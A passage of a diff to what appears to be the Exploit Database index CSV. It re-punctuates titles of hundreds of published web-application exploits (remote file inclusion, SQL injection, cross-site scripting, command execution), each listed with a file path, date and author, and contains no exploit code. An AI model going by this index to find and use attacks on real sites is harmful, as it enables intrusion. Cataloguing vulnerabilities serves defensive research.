db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 -23684,platforms/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 +23683,platforms/php/webapps/23683.txt,"VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 +23684,platforms/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0 23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 @@ -27308,7 +27312,7 @@ id,file,description,date,author,platform,type,port 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0 -23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 +23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - (Multiple Modules) Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 - Pop Parameter Cross-Site Scripting",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0 23797,platforms/php/webapps/23797.txt,"Confixx 2 - DB Parameter SQL Injection",2004-03-09,wkr,php,webapps,0 23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution",2004-03-09,wkr,php,webapps,0 @@ -27320,7 +27324,7 @@ id,file,description,date,author,platform,type,port 23812,platforms/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-15,"Cheng Peng Su",php,webapps,0 23813,platforms/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway - Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps,0 23814,platforms/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - fname Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 -23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - displaycategory.php basepath Parameter Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0 +23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0 23816,platforms/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - modules.php gid Parameter SQL Injection",2004-03-15,"Janek Vind",php,webapps,0 23817,platforms/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - nmimage.php z Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 23818,platforms/php/webapps/23818.txt,"Phorum 3.x - register.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 @@ -27440,9 +27444,9 @@ id,file,description,date,author,platform,type,port 24006,platforms/php/webapps/24006.txt,"phpBugTracker 0.9 - query.php Multiple Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 - user.php bugid Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x - Email Attachment Script Injection",2004-04-15,"spiffomatic 64",php,webapps,0 -24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 - affich.php Remote File Inclusion Command Injection",2004-04-15,jaguar,php,webapps,0 +24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 - 'affich.php' Remote File Inclusion / Command Injection",2004-04-15,jaguar,php,webapps,0 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x - Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",php,webapps,0 -24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 +24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - 'album_portal.php' Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 24034,platforms/php/webapps/24034.txt,"PHProfession 2.5 - modules.php offset Parameter SQL Injection",2004-04-23,"Janek Vind",php,webapps,0 24035,platforms/php/webapps/24035.txt,"PHProfession 2.5 - upload.php Direct Request Full Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0 24036,platforms/php/webapps/24036.txt,"PHProfession 2.5 - modules.php jcode Parameter Cross-Site Scripting",2004-04-23,"Janek Vind",php,webapps,0 @@ -27501,7 +27505,7 @@ id,file,description,date,author,platform,type,port 24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0 -24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0 +24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter PHP Remote File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0 24169,platforms/php/webapps/24169.txt,"Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities",2004-06-04,"HNK Technology Solutions",php,webapps,0 24172,platforms/php/webapps/24172.txt,"cPanel 5-9 - Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",php,webapps,0 24175,platforms/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 - Next_file Parameter File Disclosure",2004-06-07,"John Doe",cgi,webapps,0 @@ -27568,7 +27572,7 @@ id,file,description,date,author,platform,type,port 24294,platforms/php/webapps/24294.txt,"WordPress Plugin Developer Formatter - Cross-Site Request Forgery",2013-01-22,"Junaid Hussain",php,webapps,0 24295,platforms/php/webapps/24295.txt,"Adult WebMaster Script - Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps,0 24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting",2004-08-16,"Javier Ubilla",php,webapps,0 -24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0 +24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0 24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 @@ -27740,7 +27744,7 @@ id,file,description,date,author,platform,type,port 24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0 24629,platforms/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0 -24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Inclusion",2004-09-27,"Himeur Nourredine",php,webapps,0 +24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion",2004-09-27,"Himeur Nourredine",php,webapps,0 24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - 'wp-login.php' Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 24642,platforms/php/webapps/24642.txt,"WordPress 1.2 - 'admin-header.php' redirect_url Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 24643,platforms/php/webapps/24643.txt,"WordPress 1.2 - 'bookmarklet.php' Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 @@ -27802,7 +27806,7 @@ id,file,description,date,author,platform,type,port 24742,platforms/php/webapps/24742.txt,"Web Cookbook - Multiple SQL Injections",2013-03-13,"Saadat Ullah",php,webapps,0 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 < 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0 24748,platforms/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 -24751,platforms/php/webapps/24751.pl,"phpBB 2.0.x - 'admin_cash.php' Remote PHP File Inclusion",2004-11-17,"Jerome Athias",php,webapps,0 +24751,platforms/php/webapps/24751.pl,"phpBB 2.0.x - 'admin_cash.php' PHP Remote File Inclusion",2004-11-17,"Jerome Athias",php,webapps,0 24752,platforms/php/webapps/24752.txt,"Invision Power Board 2.0 - 'index.php' Post Action SQL Injection",2004-11-18,anonymous,php,webapps,0 24759,platforms/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",php,webapps,0 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 @@ -27921,10 +27925,10 @@ id,file,description,date,author,platform,type,port 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injections",2005-03-02,"benji lemien",php,webapps,0 25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 - Nav.php3 Cross-Site Scripting",2005-03-03,benjilenoob,php,webapps,0 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension - SQL Injection",2005-03-03,"Fabian Becker",php,webapps,0 -25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Remote PHP File Inclusion",2005-03-04,"Filip Groszynski",php,webapps,0 +25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",php,webapps,0 25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,php,webapps,0 25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 -29278,platforms/php/webapps/29278.pl,"Work System eCommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0 +29278,platforms/php/webapps/29278.pl,"Work System eCommerce 3.0.3/3.0.4 - 'forum.php' Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps,0 25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8/4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0 25014,platforms/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,php,webapps,0 @@ -27934,7 +27938,7 @@ id,file,description,date,author,platform,type,port 25038,platforms/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injections",2004-12-18,"James Bercegay",php,webapps,0 25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0 -25043,platforms/php/webapps/25043.txt,"phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0 +25043,platforms/php/webapps/25043.txt,"phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0 25044,platforms/php/webapps/25044.txt,"phpGroupWare 0.9.x - 'index.php' HTML Injection",2004-01-27,"Cedric Cochin",php,webapps,0 25045,platforms/php/webapps/25045.txt,"2BGal 2.5.1 - SQL Injection",2004-12-22,zib,php,webapps,0 25051,platforms/cgi/webapps/25051.txt,"Wirtualna Polska WPKontakt 3.0.1 - Remote Script Execution",2004-12-23,"Poznan Supercomputing",cgi,webapps,0 @@ -27989,7 +27993,7 @@ id,file,description,date,author,platform,type,port 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25142,platforms/hardware/webapps/25142.txt,"D-Link DNS-323 - Multiple Vulnerabilities",2013-05-02,sghctoma,hardware,webapps,0 25143,platforms/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 - SML Code Script Injection",2005-02-21,"Daniel A.",php,webapps,0 -25145,platforms/php/webapps/25145.txt,"PANews 2.0 - Remote PHP Script Code Execution",2005-02-21,tjomka,php,webapps,0 +25145,platforms/php/webapps/25145.txt,"PANews 2.0 - PHP Remote Code Execution",2005-02-21,tjomka,php,webapps,0 25147,platforms/cgi/webapps/25147.txt,"Biz Mail Form 2.x - Unauthorized Mail Relay",2005-02-22,"Jason Frisvold",cgi,webapps,0 25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injections",2005-02-22,"John Cobb",php,webapps,0 @@ -28034,12 +28038,12 @@ id,file,description,date,author,platform,type,port 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 -25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 +25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - 'Votebox.php' Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0 -25232,platforms/php/webapps/25232.txt,"McNews 1.x - install.php Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0 +25232,platforms/php/webapps/25232.txt,"McNews 1.x - 'install.php' Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0 25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - search.asp Cross-Site Scripting",2005-03-17,"farhad koosha",asp,webapps,0 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection",2005-03-18,"GHC team",php,webapps,0 25236,platforms/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps,0 @@ -28063,7 +28067,7 @@ id,file,description,date,author,platform,type,port 25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-03-22,"James Bercegay",php,webapps,0 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 -25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 +25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - msg.php Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - membres.php mt Parameter Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 @@ -28191,7 +28195,7 @@ id,file,description,date,author,platform,type,port 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25447,platforms/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 25449,platforms/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 -25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 +25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 25455,platforms/asp/webapps/25455.txt,"OneWorldStore - 'DisplayResults.asp' SQL Injection",2005-04-19,Lostmon,asp,webapps,0 25456,platforms/asp/webapps/25456.txt,"OneWorldStore - 'DisplayResults.asp' Cross-Site Scripting",2005-04-19,Lostmon,asp,webapps,0 25457,platforms/php/webapps/25457.c,"UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection",2005-03-11,HLL,php,webapps,0 @@ -28260,7 +28264,7 @@ id,file,description,date,author,platform,type,port 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 - StrCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 - error.php Remote File Inclusion",2005-04-26,Kold,php,webapps,0 +25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 - 'error.php' Remote File Inclusion",2005-04-26,Kold,php,webapps,0 25539,platforms/asp/webapps/25539.txt,"MetaCart2 - IntCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25540,platforms/asp/webapps/25540.txt,"MetaCart2 - StrSubCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25541,platforms/asp/webapps/25541.txt,"MetaCart2 - CurCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 @@ -28378,7 +28382,7 @@ id,file,description,date,author,platform,type,port 25700,platforms/asp/webapps/25700.txt,"Spread The Word - Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 25701,platforms/asp/webapps/25701.txt,"Spread The Word - Multiple SQL Injections",2005-05-24,Lostmon,asp,webapps,0 25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0 -25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 +25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,asp,webapps,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 @@ -28450,9 +28454,9 @@ id,file,description,date,author,platform,type,port 25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site - 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection",2005-06-01,"Dj romty",asp,webapps,0 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injections",2005-06-02,"Dedi Dwianto",asp,webapps,0 -25786,platforms/php/webapps/25786.txt,"MWChat 6.7 - Start_Lobby.php Remote File Inclusion",2005-06-03,Status-x,php,webapps,0 +25786,platforms/php/webapps/25786.txt,"MWChat 6.7 - 'Start_Lobby.php' Remote File Inclusion",2005-06-03,Status-x,php,webapps,0 25787,platforms/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",php,webapps,0 -25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Inclusion",2005-06-03,"Leon Juranic",php,webapps,0 +25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion",2005-06-03,"Leon Juranic",php,webapps,0 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection",2005-06-06,Romty,asp,webapps,0 25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Local/Remote File Inclusion",2005-06-06,anonymous,php,webapps,0 25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x - view.php Cross-Site Scripting",2005-06-06,anonymous,php,webapps,0 @@ -28500,9 +28504,9 @@ id,file,description,date,author,platform,type,port 25854,platforms/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0 25855,platforms/asp/webapps/25855.txt,"I-Gallery - Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25856,platforms/php/webapps/25856.txt,"PAFaq - Administrator 'Username' SQL Injection",2005-06-20,"James Bercegay",php,webapps,0 -25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 +25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 25858,platforms/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro - Multiple SQL Injections",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 +25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 25860,platforms/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 - type.asp iType Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 25861,platforms/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 - productDelete.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 25862,platforms/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 - productEdit.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 @@ -28575,7 +28579,7 @@ id,file,description,date,author,platform,type,port 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x - Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0 25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.cgi Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0 25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,php,webapps,0 -25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0 +25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0 25942,platforms/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0 25945,platforms/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0 @@ -28677,7 +28681,7 @@ id,file,description,date,author,platform,type,port 26077,platforms/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps,0 -26079,platforms/php/webapps/26079.txt,"Comdev eCommerce 3.0 - config.php Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 +26079,platforms/php/webapps/26079.txt,"Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 - WCE.download.php Directory Traversal",2005-08-05,anonymous,php,webapps,0 26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - dwt_editor.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_newsletter.php' language Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 @@ -28774,14 +28778,14 @@ id,file,description,date,author,platform,type,port 26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog - Html Injection",2005-08-24,ali202,php,webapps,0 26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - error.php Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0 26200,platforms/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",php,webapps,0 -26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 - Api.php Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps,0 +26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps,0 26202,platforms/php/webapps/26202.txt,"Looking Glass - Cross-Site Scripting",2005-08-27,rgod,php,webapps,0 26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,php,webapps,0 26204,platforms/php/webapps/26204.pl,"MyBB - member.php SQL Injection",2005-08-29,W7ED,php,webapps,0 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php' c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 